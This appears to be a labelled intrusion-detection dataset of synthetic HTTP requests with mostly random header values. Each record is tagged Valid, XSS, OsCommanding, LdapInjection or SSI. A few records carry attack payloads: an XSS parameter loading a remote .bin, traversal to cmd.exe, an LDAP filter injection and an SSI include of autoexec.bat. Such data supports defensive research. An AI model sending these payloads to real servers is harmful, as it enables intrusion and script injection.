Warning: 866 www.oconNlik.css "mroi7llcSoci3da" "Tue, 06 Dec 05 15:49:11 CET"
X-Forwarded-For: 188.221.207.247
X-Serial-Number: 90811893689450682103
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21197
Start - Id: 4358
class: Valid
POST /owTvf/4WS0QUfUFy/HgaO/nlbusrpogeha/7s062t7e/tTV/wo/0Sl772ufLcSbK7IC2Y@/enlqea7olbrgrt/IfeZe.php3? HTTP/1.1
Content-Length: 182
Content-Language: b,benw4q,arjTilf
Content-Encoding: gzip
Content-Location: /sya0wtt/a8zga/nddgs/sC1n/7ooOni6.htm
Content-MD5: OW5vc29uMWhpN29ud2VyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Mar 10 02:59:36 GMT
Last-Modified: Fri, 17 Mar 06 20:12:34 UTC
Host: www.ochzcqm.gov:16
Connection: p0stkoh
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, compress, gzip, identity, compress;q=0.4
Accept-Language: aatnneto-doidsh0;q=0.7
Cache-Control: min-fresh=87948
Client-ip: 153.252.139.251
Cookie: riDe=999041;OnBI2L@script.TJ=etzno;j4e3mB=967;Othizs=n zeible;lEcatafsxaadrh=eIb7MJ
Cookie2: $Version="95"
Date: Sun, 28 Oct 07 22:57:41 UTC
ETag: W/"LNmZv3R-t@g81Cm"
Expect: ltrttnWd=hnnQVx;g2NLt
From: rnlntae@sfalxIa.org
If-Modified-Since: Tue, 07 Apr 09 05:47:08 CET
If-Unmodified-Since: Sat, 18 Aug 07 06:35:23 GMT
If-Match: "OV46CF4MXpeo@Y8yI"
If-None-Match: "QJU.7hyFc@FvynOBnuc"
If-Range: Sun, 23 Apr 06 15:44:17 GMT
Max-Forwards: 4966
MIME-Version: 5.2
Pragma: rlSndpsn='1l'
Proxy-Authorization: Basic aWc3ZXI6UmVPZDV0aXU=
Authorization: Basic dWRyaW9ybjpzbFJyY290ZQ==
Range: 8-5728,5-967,67441-616423
Referer: http://euDdt.it/rqD4/ncuusn3A.mdb
TE: deflate
Trailer: Range
User-Agent: 7w2nwximhgerzemzr
UA-CPU: x86
UA-Disp: 6759,8844,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1837x602
Via: 8.2 www.z9It.css, 7.2 111.208.57.149
Transfer-Encoding: cATor; Ehtse=lsli3oya
Upgrade: qxoo/3.2, 9eer/3.9, 7jet8r/7.2, ratm/0.1, rSgl/5.7
Warning: 055 244.62.200.40:2 "0plu" 
X-Forwarded-For: 139.143.108.151
X-Serial-Number: 83365893402992
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

Neseieny6z2o9o=irxltI_e6l&jertB=leyEnSe83&litr=n'w&7ere9om=mjktbD&dwO9aeeh=kn8ni&ord2=/'o 4seoptuabanH&hetcl15odrT=Alos&msystemvbscript33HdHorV_=yhdocumentyhhtsfloi@s'leg p

End - Id: 4358
Start - Id: 27101
class: Valid
GET /stdinsddivv/rFN0Slikeid7YX/passwd7KjYlocationYyIUnK/aitae.asmx?reed=lexecciscriptgikeiusih&fNIieitsOsei=91602997&3sd=84&faddoge=exfECsafelh%40h&gpqisdegrngroa=48039&mtunEn=ti%3F7an%24%24ve HTTP/1.0
Host: www.otytee4.uk:008
Connection: close
Accept: application/rtf;q=0.4, application/zip;q=0.8, text/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 48.12.79.212
Cookie: etj1svsiid=beeq;1a3hy=8;Tnake=82019;srre6u1seh4ea=s su:admin(x;hresrnoy=8102371;aeh7ifimtwmdhm=03
Cookie2: $Version="309"
Date: Sat, 22 Jan 05 03:15:06 UTC
ETag: W/"-K_I8KcrnHjO1jBPvpv"
Expect: 1tohn=atre;ynrrcan=2jQor
From: hhafeiO@hshvl.net
If-Modified-Since: Fri, 01 Aug 08 09:02:40 CET
If-Unmodified-Since: Wed, 10 Feb 10 17:41:59 CET
If-Match: "aIZJ9z39Om-b4q2k"
If-None-Match: *
If-Range: Mon, 22 Mar 04 18:51:52 UTC
Max-Forwards: 7
MIME-Version: 4.2
Pragma: wrl6cw=Stnouix
Proxy-Authorization: Basic eHRodGE6bnEwc2Vhb2U=
Authorization: Digest realm
Range: 22-,0045-2456,-6
Referer: /ftsror/6yri/s8nda/e1ycxxrn.cgi
TE: chunked;q=0.2
Trailer: Expect
User-Agent: Mozilla/6.5 (Machintosh; U; Mac OS X 1.3; db-oh; rv:0.0.8) Gecko/47371208
UA-CPU: Sparc
UA-Disp: 724,7981,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1019x630
Via: oenAn/4.8 www.nwjrtC.html, HTTP/6.9 www.ferta.gif, FTP/8.3 206.91.222.131
Transfer-Encoding: atlaO
Upgrade: tii/2.0, axpd/5.6, taa/0.9
Warning: 449 www.kiaeed.tiff "omehrrrangjiAinemo" "Sat, 24 Apr 10 07:58:27 UTC"
X-Forwarded-For: 38.254.21.15
X-Serial-Number: 3641871765037584
----: -------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 27101
Start - Id: 48059
class: XSS
GET /93XkFYA-tghHCueOBX7/fYOu4i/rIUk1usRT498h/lO/ESZ_nOP7/a3/frf_ZHF.BFPS/groZ8aKKN0k4dK0/ysimcn53eodieeolct.png?formSVDvsJ%ujP6=8&SomxYOs=hm9letapsemrdr&e2qlu=dySwC&hEinda=VeI3ee5nt9&ajrsbtiaf=Ptevny6rme6m&a3Tcde4l0ttr=045&seaahoeu5E3f=42352840&Fahehy=25&oh2u8=4470374&rtmadDo=e7SdZlIU9QzQ&laid3roylIRrcT=%3Cdiv++++style+++%3D%22++behaviour%3A+url%28%5Bhttp%3A%2F%2Fwww.ranserer.com%2Fscript%2FltmonsNaDc.bin%5D%29%3B+%22+++%3E&kiairet9e9th=nn7ulj&oTed=006029&owtfuimtbnelde=R%3C&QDwZrhW.IKBL=7cani HTTP/1.0
Host: 117.25.241.225
Connection: close
Accept: image/*, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 199.91.154.140
Cookie: 6b5br= ya;bhoinT=758722;oramnaaH=91022;osbO=0764012
Cookie2: $Version="9"
Date: Sun, 10 Jul 05 18:01:37 GMT
ETag: W/"@AY44BLRCYw-DcLtsp"
If-Modified-Since: Wed, 12 Jul 06 16:50:46 UTC
If-Match: *
If-None-Match: "nxswnkQNfG669Sdi1"
If-Range: Wed, 26 Apr 06 17:31:58 UTC
Max-Forwards: 5451
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Yean xazroh=heTobre
Authorization: sedh aaieeArs=mnoE
Referer: /nriai/zAtettir.asmx
User-Agent: a3xmitUfeLh
UA-CPU: PowerPC
UA-Pixels: 8331x5573
Transfer-Encoding: deflate
Upgrade: edtthr/9.5, Yast/6.8, ti2epi/5.7, tgb0/4.2
Warning: 781 www.isNI.css "dzC8lnsdienehnu3Ca" "Sat, 10 Mar 07 07:20:14 GMT"

null

End - Id: 48059
Start - Id: 44224
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: 154.41.255.182:80
Connection: 1eyHESja
Accept: */*;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: eholi7-thb;q=0.2, s1-wsaeddee;q=0.8, Sgmde-0jesaa
Cache-Control: max-stale
Client-ip: 224.86.31.255
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="781"
Date: Wed, 11 Oct 06 17:55:14 UTC
ETag: "YbIP.iawOLfpBceJ7ne"
Expect: 100-continue
From: 3hsm@ab3Aorrvi.de
If-Modified-Since: Sat, 23 Aug 08 05:22:59 CET
If-Unmodified-Since: Fri, 20 Mar 09 03:34:05 UTC
If-Match: *
If-None-Match: *
If-Range: "sfj@VJX@v8_BJpBn@uF"
Max-Forwards: 6119
MIME-Version: 1.8
Pragma: NuD='0dtugo9'
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: Digest cnonce="a1las"
Range: 09660-850419
Referer: /mrcccnam.swf
TE: deflate,trailers
Trailer: Proxy-Authorization
User-Agent: eOk98tfq. http://www.i2oidbi7.net
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 352x848
Via: 8.3 www.apL7ee.shtml:97, 8.2 www.suDis.shtml
Transfer-Encoding: eioon; ioTauWiM=aiit3ka
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 096 42.244.161.150:67 "Tarraeaaint" "Sat, 16 Oct 04 16:51:00 GMT"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44224
Start - Id: 10803
class: Valid
GET /ILJ@pl.tU/HsystemNiV5exec-/nntoehdynvazqg/xprMl7R-sG/iisenysTeyoeptmiicn7.js?7af9ftoebhetorS=5946&hhm6neisSusciae=aseaj5td&sejeaAx=b%3Ffc5&desAItesyrue7pn=hsoanrihtpailt&nJtolAi4iie=idslecpdninunott&ovgswarii=nent%5Co0%5D+nace&y2EnsuIsi=5454698481&raiendcaGe=25009801&er=ngcULTqQLTKO HTTP/1.0
Host: 46.39.32.52
Connection: close
Accept: */*
Accept-Charset: shift_jis
Accept-Encoding: *
Accept-Language: 9tniiLet-tsiqkt, ed-a;q=0.0, oi-ancwub;q=0.0, 6jibxnrc-Ite
Cache-Control: no-store
Client-ip: 195.254.67.11
Cookie: VaRzgC_tqT=execgts;P3l0laslttnueze=%telnetb$;Tssuptarhe=nninclude ]]sm trx%ue;bt=eogxqAMV;GGinputDOFO0B=9057670;adtnsti3=ceatelnetacceptaYnnlocatione
Cookie2: $Version="9"
Date: Wed, 10 Jan 07 20:16:00 CET
ETag: "fNmsx9usxqQx6nMj2L4"
Expect: edeosGeb
From: etraE@esntn6w.fr
If-Modified-Since: Tue, 31 Aug 04 01:05:21 CET
If-Unmodified-Since: Sun, 18 Oct 09 12:33:06 GMT
If-Match: *
If-None-Match: "6B5AZ.GfuRjsDNKXzXv"
If-Range: Sat, 09 Jan 10 14:39:27 CET
Max-Forwards: 3
MIME-Version: 5.1
Pragma: erricsaO=iaal
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest cnonce="nveihPip"
Range: -605203
Referer: /t1obbl/cHzur/hscledb/ddohe/tnwsav11.gif
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: n1q41cVkr http://www.rr4o0.it
UA-CPU: 68000
UA-Disp: 4468,6865,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4636x443
Via: 6.2 www.3g4e.shtml, otN/5.0 55.72.25.101, 7.9 www.ecfnesed.js
Transfer-Encoding: deflate
Upgrade: dfeo/3.1, 4aehpf/3.9
Warning: 951 140.118.229.134 "esuyiiii5XtSsn4ie8" 
X-Forwarded-For: 44.92.107.214
X-Serial-Number: 026884237453850145
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10803
Start - Id: 23796
class: Valid
GET /modormgalesierut/tG6g@oiwIf_BP/andcsxXh.nsf?idhretneiaapGe=spcree9bhwsoqb&tXz9SHLcSpsIo=6742458&sM7GWGC7=eOmeacdQn&9eiRclcen=edresgv&nmaloFiftvs8=mRu&dropfromEPtmn1Z0Wp=alwrs%3BRnpq+d3 HTTP/1.1
Host: 182.243.57.97
Connection: ircn
Accept: text/*
Accept-Charset: windows-874;q=0.2, cp-932, x-mac-japanese;q=0.3
Accept-Encoding: deflate, compress
Accept-Language: hupsn-tgeNi8, s-0t, ehtpn-duonoy, ct-Aadcytf0, gc-sAfboarl
Cache-Control: max-stale=182
Client-ip: 154.88.240.38
Cookie: eug=00;xtermVWO3=aounr;nF=07253038;aecaotmRek8ot=nOshBpGgC2Kn
Cookie2: $Version="4"
Date: Tue, 10 Nov 09 24:28:37 GMT
ETag: W/"FkesPB9GNCNNHLdcN"
Expect: 100-continue
From: xe7vcre@gune.org
If-Modified-Since: Sun, 29 May 05 13:49:40 UTC
If-Unmodified-Since: Sun, 16 May 04 24:43:09 GMT
If-Match: *
If-None-Match: "mgQ3U.3n@jWlLfR0x"
If-Range: Mon, 08 May 06 24:57:21 CET
Max-Forwards: 8
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: aexW uNxasr=6oeb
Authorization: NTLM ZXRkZHJuaWR0b3BmYW9pZGJ0SXNFd2FzdXl0YWg1MGRuY1NpTWhvdXpl
Range: 323-
Referer: http://www.eeqln.net/ua6trcai/Dsonieoe/coeo/natiutq.sh
TE: chunked;q=0.9
Trailer: If-Modified-Since
User-Agent: Rrpcnscgve8oon6
UA-CPU: MIPS
UA-Disp: 7512,9255,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 884x6494
Via: 0.6 149.236.70.234, FTP/6.5 www.8toedine.js
Transfer-Encoding: compress
Upgrade: oeeuii/6.6, inSid6/6.9, srlses/9.9
Warning: 765 www.oiit7.html:14 "goersPi" 
X-Forwarded-For: 151.135.237.72
X-Serial-Number: 28931730
----: -----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 23796
Start - Id: 38031
class: LdapInjection
GET /yinsogm9U.gif?i4=%29%28%7C++++%28llo%3Dlswi*%29&axseatlpsioo=evall HTTP/1.1
Host: www.nmetfe4ene.de
Connection: ol1rY
Accept: text/xml;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, gzip;q=0.4, deflate;q=0.0, deflate;q=0.5, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 252.123.213.7
Cookie: eghs1=72428159
Cookie2: $Version="71"
Date: Thu, 21 Jan 10 11:25:36 GMT
ETag: W/"hJ9vUmp.@v3Mr.ewG7Hg"
Expect: 100-continue
From: aFbh@rtrss.de
If-Modified-Since: Thu, 23 Sep 04 14:49:11 UTC
If-Unmodified-Since: Sat, 26 Feb 05 02:43:58 CET
If-Match: "BRJCw96kieF7Xah"
If-None-Match: "QSr6v@_Y9pFJEoDKD"
If-Range: Thu, 18 Feb 10 03:25:18 GMT
Max-Forwards: 6
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: ns6mf r0kt=b8art
Authorization: Basic dXJlNThwaTplYXJuaWM=
Range: 67-6,809162-
Referer: http://teydaO.be/teeSr/d7nS.png
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: tiel/9.9.9
UA-CPU: x86
UA-Disp: 2707,126,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 427x816
Via: 4.0 www.sh3seq.gif, 3.0 www.ageeaWiO.html, FTP/4.6 52.36.212.119
Transfer-Encoding: rErp
Upgrade: e6ic/2.4, akt/3.2
Warning: 508 192.205.119.35 "nt4dwdbahmiorotHpmts" "Tue, 19 Apr 05 13:54:10 CET"
X-Forwarded-For: 59.200.146.205
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38031
Start - Id: 28420
class: Valid
GET /eTuXN21gaUmKN6do/njR7DNlgWiK/YHouAicplAheroEupel/dC@7NmTx.htm? HTTP/1.1
Host: 215.249.248.18
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.5, gzip;q=0.5, identity
Accept-Language: *;q=0.1
Cache-Control: max-age=9563
Client-ip: 80.103.55.142
Cookie: s3a3hddhNstUcpE=opt(cu;a41iyp=880593513;66b=50;oerjii=Nnb8hoe k;ta3mn4twxa=26235
Cookie2: $Version="7"
Date: Thu, 04 Oct 07 07:24:51 CET
ETag: W/"1gX9YQdgjmVgQfs"
Expect: nAkim7dd
From: oBcae9t@txO3eond.biz
If-Modified-Since: Fri, 18 Jan 08 01:43:45 UTC
If-Unmodified-Since: Sun, 06 Mar 05 12:23:54 GMT
If-Match: *
If-None-Match: "JgV4g0ASF40_keu"
If-Range: Sat, 22 Dec 07 24:39:23 UTC
Max-Forwards: 36
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic Tm10dGUzOkRFdHNlUw==
Range: 9246-,43437-,-51100
Referer: http://MsllBr.gov/ieain.asmx
TE: gzip;q=0.4
Trailer: If-Range
User-Agent: oxpsanla6 (oyY4tg7; sCc47.)
UA-CPU: PowerPC
UA-Disp: 243,084,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6329x3487
Via: 1.4 www.eaty2w.html, HTTP/9.7 www.Sodkzny.png, 14gina/3.8 www.iace.jpg
Transfer-Encoding: deflate
Upgrade: fioa/5.4, weeo/7.8, l0s/3.4, srerh/3.7
Warning: 999 www.inZhH.jpeg:2 "ret1" 
X-Forwarded-For: 7.153.57.18
X-Serial-Number: 15983235
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28420
Start - Id: 27759
class: Valid
GET /rLZC.o/rn/eu3.z_fRz2ROjaS/kRyIJA0vXKy4TqIXxN/4Inszm1gmLHXpaY/leeewmktnn/hy1sp/WXnHm1N7SnYlliframe/qRu@Bl_fHHKxw/cdZ20J/eube0miodyA.cgi? HTTP/1.0
Host: www.vebjszz.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.9, gzip;q=0.0, identity, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 0.248.201.216
Cookie: M9G2nullB-b_z=tedenoMsolxgseo;ehmeeheorEeN= a;remOGmhed=7F8jkEVkM4.
Cookie2: $Version="3"
Date: Fri, 06 Apr 07 09:06:12 UTC
ETag: W/"54VBcnNUrMKe9g-K2Aos"
Expect: 7egEuE=awnona;scroPbp7
From: uZwsha@tg2sae.gov
If-Modified-Since: Tue, 12 Aug 08 06:28:59 UTC
If-Unmodified-Since: Sat, 10 Jul 04 11:26:51 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 74
MIME-Version: 2.1
Pragma: ln=llb
Proxy-Authorization: NTLM YWFlbHNueWNyZ0lpd2VhdXd1ZTF0MWVpN2FURXdyenVl
Authorization: Digest realm
Range: 2-,339-73
Referer: http://www.6m9ni55p.biz/wmaa5jnc/e38uem/2rpn.css
TE: deflate
Trailer: Host
User-Agent: Mozilla/2.9 (Windows; U; Win98 6.0; pn-nl; rv:1.9.7) Gecko/92461436
UA-CPU: x86
UA-Disp: 158,739,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 483x5740
Via: 6.2 www.iwneDer.js, HTTP/9.1 96.3.125.203, 7.9 www.nEedwht.htm
Transfer-Encoding: compress
Upgrade: osynnp/8.4, cny/5.4, axd/4.1
Warning: 643 114.204.41.96 "onreoj3eneols3hnaj" "Tue, 25 May 04 07:31:58 UTC"
X-Forwarded-For: 222.77.194.240
X-Serial-Number: 256698379
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27759
Start - Id: 24739
class: Valid
GET /duvE16SEw6orG-vFJ/ctSinnephdm2ra0/osyfoW/Oxpnsq/heohhinO/6-Q/ax1vn8wJ3VCLTg2C2/W7rp/ytelnetgGhu@_/tcEgOsirfdni/dS0xtoieersleI1eaded.js? HTTP/1.1
Host: 27.5.86.103:80
Connection: close
Accept: application/*;q=0.9, audio/*, text/html;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 68.199.55.36
Cookie: 7F_Jwp-tmpYyJchildN=tD6dujcKfIuP;1ytto2ohafsi=1o ;varBIIg@@=gae;S_E7Tchildcopyp=nSwDpRg
Cookie2: $Version="25"
Date: Tue, 07 Nov 06 02:34:04 UTC
ETag: W/"hfpc@s08k8DrWdBh"
Expect: 100-continue
From: 4Pioe@levcc.org
If-Modified-Since: Fri, 11 Sep 09 23:24:31 UTC
If-Unmodified-Since: Thu, 01 Nov 07 10:52:32 GMT
If-Match: "7IFfS56cHa8ge0PKSL_"
If-None-Match: *
If-Range: *
Max-Forwards: 55
MIME-Version: 4.2
Pragma: yntaess='vrbI'
Proxy-Authorization: NTLM a0ZwemhFeE9pc041aHNhQWhvZXJycGxpb2VyaW8wQ2VlaVZzZXdhWmg=
Authorization: NTLM bWhuaWxwY242aXNtOHdkZmRlbHJrZ2l0Z25naGN5dGNjdGlJbGVoTmV0
Range: 991-
Referer: http://ijois.it/t5heAo/nhqh/tsaiccs.jpg
TE: gzip,trailers
Trailer: Max-Forwards
User-Agent: iAbsdallo (nCE-rdK; 1Qn.Tm; fHkssAgKC; 9nRYip; iNIuU0D@3)
UA-CPU: PowerPC
UA-Disp: 572,4672,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: 7.4 162.26.227.63
Transfer-Encoding: deflate
Upgrade: g8mn/1.2, BihP/1.3, isA/2.4, gnpI/4.1
Warning: 152 www.nuoOelo.jpg "ddh66yrn" "Wed, 01 Jun 05 18:22:47 UTC"
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 319119855540809
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24739
Start - Id: 40711
class: SSI
PUT /akP/mpheehh6he0rn7ehqer6/wmo14berosn0tcab/den6oItetlywFehia/adgwwraSaxqortsah/fCA2ITn/ydorq5IpositiondevalI586Zg.dll? HTTP/1.0
Content-Length: 70
Content-Language: aae2eboi,5anfu
Content-Encoding: gzip
Content-Location: /0ibhr.asp
Content-MD5: N2VhdHRrclJqeXNuaGliZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Jun 04 17:09:52 UTC
Last-Modified: Sun, 14 Aug 05 12:04:58 GMT
Host: www.etasdesdSn.net:80
Connection: dmiq
Accept: */*
Accept-Charset: windows-1255, koi8, big5, x-mac-japanese;q=0.0, iso-8859-7;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 252.167.57.191
Cookie: ile2tld1eweyo=e4ghaAperlt ;DYMzpq6=2Nnlihet4fdrrtQ2;ioAeri=oeoiotttopen7ddte;copyZJ-telnetWxKhtacces=ekmaoifo0r;tselectVGexecLccatphpNCw=<!--     #include virtual="d:\windows\autoexec.bat"-->;0tA5heAtaeBtp=eU65ohGq2n
Cookie2: $Version="0"
Date: Tue, 15 Apr 08 06:12:50 CET
Expect: etqfdncl=ihi5of;sDsnmeCd
If-Modified-Since: Fri, 31 Dec 04 11:14:37 UTC
If-Unmodified-Since: Tue, 02 Jan 07 08:52:30 GMT
If-Match: *
If-Range: *
Max-Forwards: 00
Pragma: ls=airta
Referer: http://www.mgAc.de/Hoher.bin
TE: trailers
User-Agent: dcfn7smr (bra2_kHcGW; aY@rg.aPje)
UA-CPU: x86
UA-Disp: 1082,158,8
UA-Color: color8
UA-Pixels: 563x6665
Via: FTP/7.2 www.Tunso6i2.html, HTTP/0.8 www.sminie.js:55
Transfer-Encoding: compress
Warning: 303 www.ewop.html:49 "hPht" 

XiaoweietRkNn=Hdf0e1jnei&ehYdfn=o5mocha&m1=4491005841&1mdSnhuyn7= ABew

End - Id: 40711
Start - Id: 17310
class: Valid
GET /ys/PsystemW@Q/WyN/dJAdXT75moCn-E/lVk/p.fA4lH3.TZl/Pt3i/rlAjY0oT9QctfTXB2f/tvr3ejnndlsh9JNr/pli89ootpguolj/.y5@eb/e11VrwlVL1ahea4aXac.msf?easwu4=3564&seit=c&ni9o=9411111&htAg0etqMehctl=%28ysR&HuWincludeQandxKawde=52021022&fkaeaeof=csameni&yocarr=edtr1laseioh&tRtt4usdkh=2710782392&tgidu=%28oewp-Erl%7E%40log+stylet&pgoaesunttdue0o=75733049&OaItH=656 HTTP/1.0
Host: www.1uxI5a.cz
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.4
Cache-Control: m0=uelgth
Client-ip: 108.40.148.167
Cookie: Sxlltirs=5303084;athkal=ot94;e8ecna1=oinyherdu
Cookie2: $Version="37"
Date: Wed, 24 Jan 07 16:13:11 UTC
ETag: W/"z7ZIhf6.P0MN21t42TF"
Expect: 1ne3oe
From: jceguo@bleacd.st
If-Modified-Since: Sat, 23 Oct 04 21:00:28 UTC
If-Unmodified-Since: Wed, 17 Oct 07 02:55:15 CET
If-Match: "xEKX.Q9HcCJZw05"
If-None-Match: *
If-Range: "WnL.8rJeBFhmuJ_QB8"
Max-Forwards: 5
MIME-Version: 0.0
Pragma: aenea=itaosU3
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: NTLM ZW8zZW5xMmFoc2xvb3V6amxwU2VmNmh3b1VJc2FveGxlR3RjZWc=
Range: -931680,-79387,-6
Referer: http://2icmmde.cz/n2Tar.dll
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/6.0 (compatible; MSIE 8.3; Windows NT; Awllrhd)
UA-CPU: Sparc
UA-Disp: 8556,725,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0027x5589
Via: HTTP/2.4 www.vkteac8D.htm:98592, 3.8 62.81.169.150:16768
Transfer-Encoding: compress
Upgrade: rtwAw/6.8, rmn5/1.4, az0mh/5.0
Warning: 113 www.scrt.css "niweICl" 
X-Forwarded-For: 105.119.73.45
X-Serial-Number: 835471798337
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17310
Start - Id: 25669
class: Valid
GET /R@7-c@sD_Jexec/MtsU.HL9te/tbr7E@dFf.htm?shIj4tEgsamtd=9&eaJs=irqvbscripth HTTP/1.1
Host: www.T4Hr.gov
Connection: close
Accept: */*;q=0.2
Accept-Charset: gb2312, iso-8859-3;q=0.0, cp-950
Accept-Encoding: *
Accept-Language: rrmIa0A-Op, o6nhum-e9egr;q=0.8, pxoenMe-bbd;q=0.5, 4eseeete-sl;q=0.6, ty-reno
Cache-Control: no-store
Client-ip: 227.133.53.190
Cookie: iecoui=71201;zt8oacLxbIh=ri;qOreplaceJ5kUPMRcK=370;sxahtlsp0aeocsn=70808
Cookie2: $Version="81"
Date: Fri, 30 Jun 06 02:06:04 CET
ETag: "fUrmoEcADl1vOphaKG8T"
Expect: 100-continue
From: R4kbi1mn@laxnje.st
If-Modified-Since: Thu, 18 Sep 08 13:09:56 UTC
If-Unmodified-Since: Tue, 02 Oct 07 18:49:02 UTC
If-Match: *
If-None-Match: "6z.U.YPhv1iJ1EWm1BaX"
If-Range: Tue, 04 Jul 06 03:49:33 GMT
Max-Forwards: 7
MIME-Version: 1.7
Pragma: 6Te='ns'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM YXNyc2FjWXNndG51Y3B5dTd0dzl1N3RzMnI5ZW5yY3VwdG1ic2N1aQ==
Range: 39509-,-41,-519051
Referer: http://www.SuglFas.org/iidrtsr1.jpg
TE: chunked;q=0.0
Trailer: Trailer
User-Agent: Mozilla/4.8 (compatible; caeeAal; Solaris; tjrb4hich; hcsfgYo; yelgq)
UA-CPU: Sparc
UA-Disp: 564,067,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8973x257
Via: 3.0 www.onnbcD.htm
Transfer-Encoding: identity
Upgrade: src/0.7
Warning: 768 71.160.96.112:815 "eemtw" "Sat, 22 Jan 05 09:40:57 GMT"
X-Forwarded-For: 236.247.161.119
X-Serial-Number: 33104741
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25669
Start - Id: 34175
class: Valid
PUT /e8gbQQ6.asmx? HTTP/1.0
Content-Length: 108
Content-Language: m
Content-Encoding: identity
Content-Location: http://www.ku3I3i.gov/sqalo1eh/ite9m/kctodl/wwWtU/ne9t.msf
Content-MD5: cjB6c0lyZWxlYVRhdXR0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Jan 08 06:21:18 UTC
Last-Modified: Fri, 19 Aug 05 06:10:36 UTC
Host: 124.166.119.113
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ntstbpln-kur
Cache-Control: a='s'
Client-ip: 175.250.136.161
Cookie: vwsqse4Ztd=gQF9ew905p0v;http2ebodyZfa6VA=opwutGiNtevoMiyyze;Cj5I=4kdustdhxeOreloon;lomer=2SCCa.7;t4Tlsd4=EhrssiO;g9lR9e6sHtevrws=778693961
Cookie2: $Version="6"
Date: Mon, 07 Jun 04 21:14:20 UTC
ETag: W/"pqMamA4R6r0UMCg.mI6n"
Expect: ehwweaim=idlnwm;ebiez=c4qDn0T
From: nttld@dermemt1.biz
If-Modified-Since: Sat, 09 Jan 10 22:21:54 CET
If-Unmodified-Since: Thu, 11 Mar 10 08:34:31 UTC
If-Match: *
If-None-Match: "EOAQGE9Lq6yb94I0"
If-Range: Tue, 14 Jul 09 05:36:56 GMT
Max-Forwards: 4
MIME-Version: 8.3
Pragma: i='wryv'
Proxy-Authorization: Digest username="pcny3"
Authorization: Basic dGNlZTplTmVvNGU=
Range: -23,3-
Referer: /od6e.css
TE: trailers
Trailer: Authorization
User-Agent: gitidmme (so9tK0kx; n1kFo7; noOiM5utT1; aFN7U7r; eHn_VmYd5)
UA-CPU: MIPS
UA-Disp: 892,7658,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 318x5638
Via: HTTP/8.6 www.nqel.jpg:40738, tIu9/6.2 252.158.211.209:39659, 2.9 181.67.117.34
Transfer-Encoding: identity
Upgrade: ciwqt/3.9, Ltten/0.9
